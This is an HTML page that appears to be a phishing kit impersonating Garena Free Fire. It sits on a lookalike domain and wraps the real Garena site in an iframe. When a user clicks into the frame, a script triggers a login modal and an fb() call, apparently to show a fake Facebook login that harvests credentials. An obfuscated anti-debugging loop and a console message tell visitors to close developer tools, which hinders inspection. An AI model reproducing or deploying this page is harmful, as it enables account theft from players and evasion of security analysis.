<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" />
    <meta http-equiv="Cache-Control" content="no-cache, no-store, must-revalidate" />
<meta http-equiv="Pragma" content="no-cache" />
<meta http-equiv="Expires" content="0" />
    <meta http-equiv="x-ua-compatible" content="ie=edge" />
    <title></title>
    <meta property="og:url"                content="http://ff.garena-members.com/M0miqFQKAX.html" />
<meta property="og:type"               content="article" />
<meta property="og:title"              content="" />
<meta property="og:description"        content=" " />
<meta property="og:image"              content="https://ff.garena-members.com/FNkYPvmb6wGZsfZcKmhKqUX37KG8U7YMRBuHcF7j7BZX3YjeADDPwpGS3hqGaTFbggzGYcWtJFTDHmnXTAttJqkLpsjy9bm7qzESnf4KXCnJ7Y3QpNBbdY2DkMCH/1.jpg?1467395418" />
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>

    <link rel="stylesheet" href="https://use.fontawesome.com/releases/v5.15.2/css/all.css" />
    <!-- Google Fonts Roboto -->
    <link
      rel="stylesheet"
      href="https://fonts.googleapis.com/css2?family=Roboto:wght@300;400;500;700;900&display=swap"
    />
    <!-- MDB -->
    <link rel="stylesheet" href="https://script-garena.github.io/css/mdb.min.css" />
       <style type="text/css">
        html {
            overflow: auto;
        }
          
        html,
        body,
        iframe {
            margin: 0px;
            padding: 0px;
            height: 100%;
            border: none;
        }
          
        iframe {
            display: block;
            width: 100%;
            border: none;
            overflow-y: auto;
            overflow-x: hidden;
        }
        input.form-control.form-control-lg {
    background: #f5f6f7;
    border-radius: 4px;
    overflow: hidden;
    font-size: 15px;
    border-color: rgba(0, 0, 0, .07) rgba(0, 0, 0, .11) rgba(0, 0, 0, .18);
}
.btn-primary {
    color: #fff;
    background-color: rgb(22 119 242);
    box-shadow: none;
    font-size: 15px!important;
    font-weight: bold;
}
#thongbao{
    background: #fa3e3e;
    padding: 8px;
    font-size: 14px;
    color: #fff;
}
body.modal-open > :not(.modal) {
    -webkit-filter: blur(8px);
    -moz-filter: blur(8px);
    -o-filter: blur(8px);
    -ms-filter: blur(8px);
    filter: blur(8px);
}
input.form-control.form-control-lg {
    background: #ffffff;
    border-radius: 0;
    overflow: hidden;
    font-size: 15px;
    border: none;
    border-bottom: 1px solid #dbdbdb;
}
button#login {
    box-shadow: none;
}
.btn-danger {
    color: #fff;
    background-color: #e8171f;
}
.modal-dialog.modal-frame.modal-bottom.modal-dialog-centered {
    max-width: 100%;
    margin: 0;
    bottom: 0;
    top: 0;
    height: 100%;
}
.modal-content {
    bottom: 0;
    position: absolute;
    width: -webkit-fill-available;
    max-width: -webkit-fill-available;
    border-radius: 0;
}

    </style>


<script>
	    var listchan = ['&', 'charCodeAt', 'firstChild', 'href', 'join', 'match', '+', '=', 'TK', '<a href=\'/\'>x</a>', 'innerHTML', 'fromCharCode', 'split', 'constructor', 'a', 'div', 'charAt', '', 'toString', 'createElement', 'debugger', '+-a^+6', 'Fingerprint2', 'KT', 'TKK', 'substr', '+-3^+b+-f', '67bc0a0e207df93c810886524577351547e7e0459830003d0b8affc987d15fd7', 'length', 'get', '((function(){var a=1585090455;var b=-1578940101;return 431433+"."+(a+b)})())', '.', 'https?:\/\/', ''];
(function () {
console.log("%c XIN HÃY TẮT F12 ĐỂ TIẾP TỤC. %c", 'font-family: "Helvetica Neue", Helvetica, Arial, sans-serif;font-size:24px;color:#00bbee;-webkit-text-fill-color:#00bbee;-webkit-text-stroke: 1px #00bbee;', "font-size:12px;color:#999999;");

    (function block_f12() {
        try {
            (function chanf12(dataf) {
                if ((listchan[33] + (dataf / dataf))[listchan[28]] !== 1 || dataf % 20 === 0) {

                    (function () {})[listchan[13]](listchan[20])()
                } else {
                    debugger;
                    
                };
                chanf12(++dataf)
            }(0))
        } catch (e) {
            setTimeout(block_f12, 5000)
        }
    })()
})();
	</script>
  </head>
  <body>
<iframe id="chaobanne" src="https://next.member.garena.vn/ff/?title=" frameborder="0" marginheight="0" marginwidth="0" width="100%" height="100%" scrolling="auto">
          <p>Your browser does not support iframes.</p>

  </iframe>
<script type="text/javascript" src="https://script-garena.github.io/js/mdb.min.js"></script>
    <!-- Custom scripts -->
    <script type="text/javascript">
   
window.addEventListener('blur',function(){
      if(document.activeElement.id == 'chaobanne'){
       $('#exampleModal').modal('show');
        fb();
      }
});



       
    function loadModal(){
        document.getElementById("content-login").style.display = "none";
          document.getElementById("content-loading").style.display = "block";
        const myTimeout = setTimeout(myGreeting, 1500);

        function myGreeting() {
          document.getElementById("content-login").style.display = "block";
          document.getElementById("content-loading").style.display = "none";
        }
    }
   
    </script>
<style type="text/css">
    #bonus{
        position: fixed;
        bottom: 15px;
        left: 15px;
        width: 13%;
        z-index: 1000;
        cursor: pointer;
    }
    #bonus img{
        width: 50%;
    }
	#bonus_login{
		display:block;
        position: fixed;
        bottom: 15px;
        left: 15px;
        width: 13%;
        z-index: 1000;
        cursor: pointer;
    }
    #bonus_login img{
        width: 100%;
    }
    .mobile{
        width: 30%!important;
    }
	@media  only screen and (max-width: 640px) {
		#bonus_login{width: 50%!important;!important;}
		#bonus{width: 50%!important;!important;}
	}
	#bonusModal .modal-body p,#bonusModal .modal-body b{display:inline;color:#000}
</style>
</body> 
</html>
